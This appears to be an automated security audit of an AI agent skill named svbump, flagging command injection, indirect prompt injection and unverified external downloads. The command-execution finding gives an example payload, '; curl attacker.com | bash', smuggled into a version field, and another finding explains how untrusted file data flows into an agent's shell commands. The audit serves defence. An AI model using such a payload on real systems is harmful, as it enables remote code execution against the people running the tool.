svbump
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- [Command Execution] (HIGH): The skill promotes dangerous shell usage patterns, specifically subshell interpolation such as
svbump write "$(svbump read version deno.json)". If the version field in a file like deno.json contains shell metacharacters (e.g., "; curl attacker.com | bash"), it results in arbitrary command execution. - [Indirect Prompt Injection] (HIGH): The skill is highly vulnerable to data-driven attacks because it ingests untrusted data from project files and uses that data directly in side-effect-producing commands. Mandatory Evidence Chain: 1. Ingestion points: local configuration files (JSON, TOML, YAML) via the svbump read command. 2. Boundary markers: Absent; data is directly interpolated into shell commands. 3. Capability inventory: Local file system modification and shell command execution. 4. Sanitization: Absent; the tool assumes the version strings are safe.
- [External Downloads] (LOW): The skill depends on external CLI tools (svbump and changelog) without providing verification or installation steps. This creates a risk if the agent attempts to resolve missing dependencies from untrusted sources.
Recommendations
- AI detected serious security threats
Audit Metadata